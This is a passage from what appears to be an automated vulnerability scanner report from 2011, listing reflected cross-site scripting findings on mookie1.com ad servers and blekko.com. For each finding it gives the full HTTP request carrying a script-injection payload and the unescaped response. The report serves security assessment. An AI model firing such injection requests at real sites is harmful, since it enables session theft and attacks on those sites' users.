1.79. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96d9"><script>alert(1)</script>b78bb1c3bd3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300f96d9"><script>alert(1)</script>b78bb1c3bd3/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q1/P/300f96d9"><script>alert(1)</script>b78bb1c3bd3/54733850/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.80. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6d2b"><script>alert(1)</script>e47bee3f37c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90c6d2b"><script>alert(1)</script>e47bee3f37c HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 350
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/901513211/x90c6d2b"><script>alert(1)</script>e47bee3f37c/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.81. http://blekko.com/autocomplete [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 3d73f<script>alert(1)</script>63bc5c45e1d was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=http%3A%2F%2Fxs+%2Fseo3d73f<script>alert(1)</script>63bc5c45e1d HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:39:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Tue, 08 Mar 2011 02:39:08 GMT
Vary: Accept-Encoding
Content-Length: 84
X-Blekko-PT: 50d3e11cd2ac3110810eaef90e988997

{"suggestions":[],"query":"http://xs /seo3d73f<script>alert(1)</script>63bc5c45e1d"}

1.82. http://blekko.com/ws/+collegehumor.com+/ddgapi [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/+collegehumor.com+/ddgapi

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 96591--><script>alert(1)</script>673695fb9b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/+collegehumor.com+/ddgapi96591--><script>alert(1)</script>673695fb9b5 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:30:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:30:57 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:30:57 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 85321
X-Blekko-QF: Qhq
X-Blekko-PT: 546c3fe5419c228ed6c3737d20f6e524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /ddgapi96591--><script>alert(1)</script>673695fb9b5 slash_q: /ddgapi96591-->
...[SNIP]...

1.83. http://blekko.com/ws/+elbo.ws+/ddgapi [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://blekko.com
Path:   /ws/+elbo.ws+/ddgapi

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 676d8--><a>4f71632b565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ws/+elbo.ws+/ddgapi676d8--><a>4f71632b565 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:30:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:30:41 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:30:41 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 81291
X-Blekko-QF: Qchq
X-Blekko-PT: 67952cc19bbd8b16f5317385e7035816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /ddgapi676d8--><a>4f71632b565 slash_q: /ddgapi676d8-->
...[SNIP]...

1.84. http://blekko.com/ws/+nick.com+/ddgapi [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/+nick.com+/ddgapi

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 19fe5--><script>alert(1)</script>81ca749855a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/+nick.com+/ddgapi19fe5--><script>alert(1)</script>81ca749855a HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:30:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:30:40 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:30:40 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 80427
X-Blekko-QF: Qchq
X-Blekko-PT: fd616033ad1986d425d984e731367f22

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /ddgapi19fe5--><script>alert(1)</script>81ca749855a slash_q: /ddgapi19fe5-->
...[SNIP]...

1.85. http://blekko.com/ws/elbo.ws+/visualize [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/elbo.ws+/visualize

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b1276--><script>alert(1)</script>2f27a7397c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/elbo.ws+/visualizeb1276--><script>alert(1)</script>2f27a7397c8 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; domainseo-tab=domaincont-2; t=1299508790128; suggestedSlashtagsList=1; sessionid=45305018; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Mar 2011 12:03:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Fri, 05 Mar 2021 12:03:06 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 84069
X-Blekko-QF: Qchq
X-Blekko-PT: 042a38d99a6f8db8ffe718e97a91e511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /visualizeb1276--><script>alert(1)</script>2f27a7397c8 slash_q: /visualizeb1276-->
...[SNIP]...

1.86. http://blekko.com/ws/http:%2F%2Fcloudscan.me+/seo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Fcloudscan.me+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5c199--><script>alert(1)</script>8d3c8e8979c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Fcloudscan.me+/seo5c199--><script>alert(1)</script>8d3c8e8979c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; v=3; fbl=2; t=1299508790128

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:48:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:48:11 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: hq
X-Blekko-PT: ca8f9822629385a52eae4bf3cde4049b
Content-Length: 24187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seo5c199--><script>alert(1)</script>8d3c8e8979c slash_q: /seo5c199-->
...[SNIP]...

1.87. http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Fcloudscan.us+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b6468--><script>alert(1)</script>b2125480183 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Fcloudscan.us+/seob6468--><script>alert(1)</script>b2125480183 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Fxss.cx+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=3; t=1299508779576

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:47:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:47:53 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: eq
X-Blekko-PT: bda64d9e1964cd70b7369413091663d5
Content-Length: 22003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seob6468--><script>alert(1)</script>b2125480183 slash_q: /seob6468-->
...[SNIP]...

1.88. http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Felbo.ws%2F+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload cc0e5--><script>alert(1)</script>557c4487d5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Felbo.ws%2F+/seocc0e5--><script>alert(1)</script>557c4487d5b HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http://elbo.ws/+/visualize8d039--%3E%3Cscript%3Ealert(1)%3C/script%3E23bc12b73c2?&co=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; fbl=2; v=1; suggestedSlashtagsList=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:47:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:47:22 GMT
Set-Cookie: v=2; path=/; expires=Thu, 04 Mar 2021 14:47:22 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: hq
X-Blekko-PT: e26c82e37d939e4ef51df6f7252117ea
Content-Length: 25458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seocc0e5--><script>alert(1)</script>557c4487d5b slash_q: /seocc0e5-->
...[SNIP]...

1.89. http://blekko.com/ws/http:%2F%2Fxss.cx+/seo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Fxss.cx+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2d119--><script>alert(1)</script>cd9b01d6718 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Fxss.cx+/seo2d119--><script>alert(1)</script>cd9b01d6718 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2; t=1299508761762

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:47:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:47:38 GMT
Set-Cookie: v=3; path=/; expires=Thu, 04 Mar 2021 14:47:38 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: eq
X-Blekko-PT: c16cbd89bf92d14609e743ac230fd185
Content-Length: 21937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seo2d119--><script>alert(1)</script>cd9b01d6718 slash_q: /seo2d119-->
...[SNIP]...

1.90. http://blekko.com/ws/http://elbo.ws/+/duptext [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/duptext

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 621ab--><script>alert(1)</script>e87cefc468f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/duptext621ab--><script>alert(1)</script>e87cefc468f?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633; fbl=2; v=2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:40:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:40:54 GMT
Set-Cookie: v=3; path=/; expires=Thu, 04 Mar 2021 01:40:54 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26245
X-Blekko-QF: hq
X-Blekko-PT: 48b9f1946161c79ec1a3cf666dd632e7

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /duptext621ab--><script>alert(1)</script>e87cefc468f slash_q: /duptext621ab-->
...[SNIP]...

1.91. http://blekko.com/ws/http://elbo.ws/+/sections [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/sections

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload a97a6--><script>alert(1)</script>222caa3f0a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/sectionsa97a6--><script>alert(1)</script>222caa3f0a5?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633; fbl=2; v=3
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:47:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:47:20 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26259
X-Blekko-QF: hq
X-Blekko-PT: 4517bc59248ab52a9aac62710e4fec74

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /sectionsa97a6--><script>alert(1)</script>222caa3f0a5 slash_q: /sectionsa97a6-->
...[SNIP]...

1.92. http://blekko.com/ws/http://elbo.ws/+/urlseo [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/urlseo

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload d4048--><script>alert(1)</script>a9a3a3e2e54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/urlseod4048--><script>alert(1)</script>a9a3a3e2e54?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633; fbl=2; v=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:43:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:43:46 GMT
Set-Cookie: v=2; path=/; expires=Thu, 04 Mar 2021 01:43:46 GMT
